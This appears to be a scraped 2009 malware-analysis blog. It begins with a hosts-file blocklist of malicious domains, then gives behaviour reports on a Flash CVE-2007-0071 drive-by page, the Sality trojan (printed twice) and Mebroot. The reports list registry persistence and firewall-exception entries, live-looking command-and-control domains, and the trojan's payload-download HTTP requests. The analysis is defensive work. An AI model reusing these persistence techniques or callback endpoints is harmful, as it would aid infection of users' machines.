127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 vip2.51.la
127.0.0.1 web.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
May 14, 2009
Malicious Site containing SWF:CVE-2007-0071
Someone submitted this malicious link "http://jjxp22.cn/a/iqq.html" to me . It seems to be a pop-up or hidden link from some compromised sites.
After checking on the Page Source, i found an obfuscated Javascript (Shown below).
I de-obfuscated the Javascript and found that it uses Deconcept's SWFObject to embed malicious Shockwave Flash that compromise the Integer overflow vulnerbility in Adobe Flash Player 9.0.115.0 and earlier (CVE-2007-0071), which allows remote attackers to execute arbitrary code.
The malicious Flash files (6 of them, shown in the script below) will exploit the Flash player and download malicious executable files into the victim's system from various websites.
Sample Flash file info
###############
Filename: i16.swf
Size: 17897
MD5: 426969FD0D7324EE170D6F46BDB203B6
Virus Found: Bloodhound.Exploit.193 (Symantec)
On the VirusTotal website, 13 out of 39 AV detected it (Shown Below).
From the "Who-is" record, the IP (61.164.108.35) belongs to RuiAn Telecom (China).
May 5, 2009
Malware analysis: Trojan W32/Sality
I have receive a suspcious file from my colleague this morning and done a simple behaviour analysis on it.
Analysis Report:
##############
Filename: ~.exe
MD5: 3A03A20BFEFE3FDD01659D47D2ED76C8
Virus Found: W32/Sality (McAfee), TROJ_DLOADER.XOP (TrendMicro), Mal/Generic-A (Sophos), Trojan-Downloader.Win32.Agent.brxr (Kaspersky,F-Secure),
On the VirusTotal website, 36 out of 40 AV detected it (details).
Registry values added:
================
1>
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"
2> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"
The above registry setting add the malware into the Windows firewall rules and name it as "ipsec" (shown above).
3>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\24: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00
4>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.xml\1: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00
5>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\~.rkr: 08 00 00 00 06 00 00 00 80 F4 57 31 2D CD C9 01
6>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\system32\SHELL32.dll,-22913: "Shows the disk drives and hardware connected to this computer."
7>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\~.exe: "~"
Registry values modified:
==================
1> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000010
2> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000011
3> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe"
4> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe""
5> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000039
6> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000003A
7> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000039
8> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000003A
Files modifed:
==========
1> C:\Documents and Settings\Owner\Cookies\index.dat
2> C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat
3> C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat
4> C:\WINDOWS\system.ini
5> C:\WINDOWS\system32\config\software.LOG
6> C:\WINDOWS\system32\config\system.LOG
Other behaviours:
=============
System conecting to:
1> peskostruikaz.com:80
The following HTTP request found:
" GET /auq.php?8e54ce=1332546&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: peskostruikaz.com
Cache-Control: no-cache"
2> johnsonbodyshop.com:80
No request after initial handshake.
3> shopatforgetmenot.com:80
The following HTTP request found:
GET /images/mainlogo.gif?58fb0a=833062&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: shopatforgetmenot.com
Cache-Control: no-cache"
4> corporateshelters.com:80
No request after initial handshake.
Seems like the malware trying to download more malicious payload from "peskostruikaz.com/auq.php" and "shopatforgetmenot.com/images/mainlogo.gif".
Analysis Report:
##############
Filename: ~.exe
MD5: 3A03A20BFEFE3FDD01659D47D2ED76C8
Virus Found: W32/Sality (McAfee), TROJ_DLOADER.XOP (TrendMicro), Mal/Generic-A (Sophos), Trojan-Downloader.Win32.Agent.brxr (Kaspersky,F-Secure),
On the VirusTotal website, 36 out of 40 AV detected it (details).
Registry values added:
================
1>
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"
2> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"
The above registry setting add the malware into the Windows firewall rules and name it as "ipsec" (shown above).3>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\24: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00
4>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.xml\1: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00
5>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\~.rkr: 08 00 00 00 06 00 00 00 80 F4 57 31 2D CD C9 01
6>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\system32\SHELL32.dll,-22913: "Shows the disk drives and hardware connected to this computer."
7>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\~.exe: "~"
Registry values modified:
==================
1> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000010
2> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000011
3> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe"
4> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe""
5> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000039
6> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000003A
7> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000039
8> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000003A
Files modifed:
==========
1> C:\Documents and Settings\Owner\Cookies\index.dat
2> C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat
3> C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat
4> C:\WINDOWS\system.ini
5> C:\WINDOWS\system32\config\software.LOG
6> C:\WINDOWS\system32\config\system.LOG
Other behaviours:
=============
System conecting to:
1> peskostruikaz.com:80
The following HTTP request found:
" GET /auq.php?8e54ce=1332546&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: peskostruikaz.com
Cache-Control: no-cache"
2> johnsonbodyshop.com:80
No request after initial handshake.
3> shopatforgetmenot.com:80
The following HTTP request found:
GET /images/mainlogo.gif?58fb0a=833062&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: shopatforgetmenot.com
Cache-Control: no-cache"
4> corporateshelters.com:80
No request after initial handshake.
Seems like the malware trying to download more malicious payload from "peskostruikaz.com/auq.php" and "shopatforgetmenot.com/images/mainlogo.gif".
Apr 28, 2009
Malicious Website: u-toys.com
This Website "www.u-toys.com" was forwarded to me by commandrine as an suspicious website. While accessing the website, there seems to be a JavaScript running. By checking on the page source (HTML code), there is a obfuscated JavaScript (shown below). It seems to be created by some JavaScript Obfuscator application that i am not able to de-obfuscated.
After doing some behaviour analysis on the Javascript, it seems to be exploiting on some Internet browser vulnerabilities. It manage to inject an executable files into the C:\ folder on older and unpatched browser. Newly patched browser do not seems to find any "injected" files. Below is the analysis on the executable file.
Analysis Report:
##############
Filename: b01kyk.exe
Size: 327680
MD5: 615A8484F113DA99D2C172A44C9E7D31
Virus found: Trojan:W32/Mebroot.gen!A (F-Secure)
On the VirusTotal website, 11 out of 38 AV detected it (Shown below). Well-known AV not detected (Symantec, McAfee).
Registry values added:
================
1> HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 44 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 63 3A 5C 64 6F 63 75 6D 65 7E 31 5C 6F 77 6E 65 72 5C 6C 6F 63 61 6C 73 7E 31 5C 74 65 6D 70 5C 65 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 57 49 4E 44 4F 57 53 5C 54 45 4D 50 5C 46 2E 74 6D 70 00 00 00
2> HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 44 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 63 3A 5C 64 6F 63 75 6D 65 7E 31 5C 6F 77 6E 65 72 5C 6C 6F 63 61 6C 73 7E 31 5C 74 65 6D 70 5C 65 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 57 49 4E 44 4F 57 53 5C 54 45 4D 50 5C 46 2E 74 6D 70 00 00 00
3> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\o01xlx.rkr: 0B 00 00 00 06 00 00 00 00 78 6B 45 46 D4 C9 01
4> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\b01kyk.exe: "b01kyk"
Registry values modified:
==================
1> HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x0000000B
2> HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x0000000C
3> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 0B 00 00 00 7F 00 00 00 70 D2 53 1A 46 D4 C9 01
4> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 0B 00 00 00 80 00 00 00 20 91 5F 45 46 D4 C9 01
5> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0B 00 00 00 D3 00 00 00 20 5B 70 1A 46 D4 C9 01
6> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0B 00 00 00 D4 00 00 00 00 78 6B 45 46 D4 C9 01
w01f advise: Always patched up your Internet browser and beware of suspicious scripts and pop-up running in the website.
Other reports on this site:
- Security Republic - Innocent???
Mar 27, 2009
Welcome
This site is created to provide a platform for anyone to share their ideas, experiences and findings on malware analysis. Feel free to comment or e-mail me any suspicious files.
Mar 22, 2009
Info on Conficker
Found some excellent read-ups on Conficker virus by the researchers at SRI International. It is one of the best analysis on the malware so far. You can find those reports from the link below.
- An Analysis of Conficker
- Addendum on Conficker C
There are others Malware information from the SRI Malware Threat Center.
- An Analysis of Conficker
- Addendum on Conficker C
There are others Malware information from the SRI Malware Threat Center.
Subscribe to:
Posts (Atom)
